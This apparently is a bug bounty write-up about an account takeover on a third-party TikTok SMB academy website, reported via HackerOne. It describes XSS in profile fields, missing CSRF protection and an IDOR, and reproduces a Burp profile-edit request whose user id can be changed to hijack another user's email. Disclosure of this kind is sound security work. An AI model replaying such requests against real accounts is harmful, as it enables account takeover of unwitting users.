Multiple vulnerability leading to account takeover in TikTok SMB subdomain.
I’m here to tell you how I account takeover in TikTok I submitted this bug in HackerOne and I got 1000$ for this bug
this domain’s third party and out of scope he pays bounty because it’s Critical bug
First:- how did I find this domain? i take this URL from these ads it’s coming to my email
second:- this url tiktoksmbacademyeu.com
in a profile name and company name, it’s vulnerable to xss and it’s not protected to csrf or (no have CSRF token) ok this is done no problem it’s working CSRF good, i can exploit users from csrf but here, I found another bug its IDOR from changing id from 1000 to any id you can change email and name
this HTTP REQUEST from Burp after i saved profile setting i found this
POST /wp-content/themes/tiktok/includes/user/user.php HTTP/1.1
Host: tiktoksmbacademyeu.com— — — — — — — — — — — — — — -284212657035056129353908728991
Content-Disposition: form-data; name=”action”profile_edit
— — — — — — — — — — — — — — -284212657035056129353908728991
Content-Disposition: form-data; name=”name”LukyJHKHJddd
— — — — — — — — — — — — — — -284212657035056129353908728991
Content-Disposition: form-data; name=”email”hacked@protonmail.ch
— — — — — — — — — — — — — — -284212657035056129353908728991
Content-Disposition: form-data; name=”country”Anguilla
— — — — — — — — — — — — — — -284212657035056129353908728991
Content-Disposition: form-data; name=”company_name”
hacked
— — — — — — — — — — — — — — -284212657035056129353908728991
Content-Disposition: form-data; name=”u_id”
1504
— — — — — — — — — — — — — — -284212657035056129353908728991
Content-Disposition: form-data; name=”upload_an_image”
— — — — — — — — — — — — — — -284212657035056129353908728991 —
I create other accounts, I see this u_id changed from 1504 to 1505
in a burp, i changed the request and I changed the id from 1504 to 1505
i see two accounts have one email :D IDOR it’s working
VIDEO PoC
https://twitter.com/PinkDraconian/status/1490760255973863424